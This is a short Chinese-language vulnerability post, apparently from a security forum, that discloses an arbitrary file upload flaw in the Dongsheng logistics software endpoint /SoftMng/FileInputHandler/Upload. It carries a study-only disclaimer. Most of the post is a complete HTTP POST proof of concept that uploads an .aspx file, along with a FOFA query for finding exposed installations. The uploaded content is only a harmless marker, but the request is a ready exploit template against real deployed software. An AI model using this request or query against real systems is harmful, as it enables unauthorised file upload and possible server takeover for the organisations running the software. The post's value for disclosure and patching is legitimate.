免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞描述:
东胜物流 /SoftMng/FileInputHandler/Upload接口存在任意文件上传
影响版本:
东胜物流
FOFA:
app="东胜物流软件-物流软件"
POC:
POST /SoftMng/FileInputHandler/Upload HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 211
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="QAZWSX.aspx"
Content-Type: application/octet-stream
123456
------WebKitFormBoundaryFfJZ4PlAZBixjELj&"
利用/SoftMng/FileInputHandler/Upload接口上传QAZWSX.aspx文件,文件内容为123456
——–
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
没有回复内容